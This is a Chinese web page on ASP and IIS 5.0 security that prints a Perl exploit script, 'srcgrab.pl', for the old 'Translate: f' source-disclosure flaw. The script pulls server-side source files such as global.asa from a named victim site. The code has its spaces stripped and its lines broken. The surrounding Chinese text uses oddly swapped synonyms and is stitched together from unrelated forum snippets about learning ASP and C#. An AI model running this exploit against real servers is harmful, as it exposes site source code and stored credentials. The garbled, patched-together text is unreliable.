ASP网页设计iis5的asp保守

ASP最大的缺点在于网络的安全性和可靠性，企业将经营数据放在开放的平台上，最大的担忧就是如何保证这些数据不被其他人破坏。iis|iisiis5的asp保守

当IIS5.0吸收到一个特别格局的头(Translate:f)的HTTP哀求，同时UR
L开端包括一个特别字符时，IIS会利用毛病的处置办法招致文件源代码泄露。


以下代码仅仅用来测试和研讨这个毛病，假如您将其用于不合法的路子请成果自
负

#!/usr/bin/perl
#Expl0itBysmiler@vxd.org
#TestedwithsucessagainstIIS5.0.MaybeitworksagainstIIS4.0u
singashareddrivebutIhaventtestedityet.
#Getthesourcecodeofanyscriptfromtheserverusingthisexploit
.
#ThiscodewaswrittenafterDanielDocekalbroughtthisissueinBug
Traq.
#Cheers351andFractalG:)

if(not$ARGV[0]){
printqq~
Geeeitsrunning!!kewl:)))
Usage:srcgrab.plExampleUsage:srcgrab.plhttp://www.victimsite.co
m/global.asa
Ucanalsosavetheretrievedfileusing:srcgrab.plhttp://www.victi
m.com/default.asp>file_to_save
~;exit;}



$victimurl=$ARGV[0];

#Createauseragentobject
useLWP::UserAgent;
$ua=newLWP::UserAgent;

#Createarequest
my$req=newHTTP::RequestGET=>$victimurl.;#Hereistheba
ckslashattheendoftheurl;)
$req->content_type(application/x-www-form-urlencoded);
$req->content_type(text/html);
$req->header(Translate=>f);#Hereisthefamoustranslateheader
:))
$req->content(match=www&errors=0);

#Passrequesttotheuseragentandgetaresponseback
my$res=$ua->request($req);

#Checktheoutcomeoftheresponse
if($res->is_success){
print$res->content;
}else{
print$res->error_as_HTML;
}

</p>缺点：正版成本价格贵（盗版就不说了）、不够安全，大多数服务器用windows系统，没有linux安全

代码的可重用性差：由于是面向结构的编程方式，并且混合html，所以可能页面原型修改一点，整个程序都需要修改，更别提代码重用了。

最近在学asp，不要问我为什么不直接学.net，因为公司网站是asp做的所以有这个需要，卖了本书asp入门到精通，对里面的六大内置对象老是记不住，还有很多属性和方法看的头晕。

用户端的浏览器不需要提供任何别的支持，这样大提高了用户与服务器之间的交互的速度。

仓酷云

尽管MS自己讲C#内核中更多的象VC，但实际上我还是认为它和Java更象一些吧。首先它是面向对象的编程语言，而不是一种脚本，所以它具有面向对象编程语言的一切特性，比如封装性、继承性、多态性等等，这就解决了刚才谈到的ASP的那些弱点。

如何更好的使自己的东西看上去很不错等等。其实这些都不是问题的实质，我们可以在实践中不断提升自己，不断充实自己。

Request:从字面上讲就是“请求”，因此这个是处理客户端提交的东东的,例如Resuest.Form，Request.QueryString,或者干脆Request("变量名")

我可以结合自己的经验大致给你说一说，希望对你有所帮助，少走些弯路。

学习是为了用的，是为了让你的程序产生价值，把握住这个原则会比较轻松点。除此之外，课外时间一定要多参加一些社会实践活动，来锻炼自己的能力。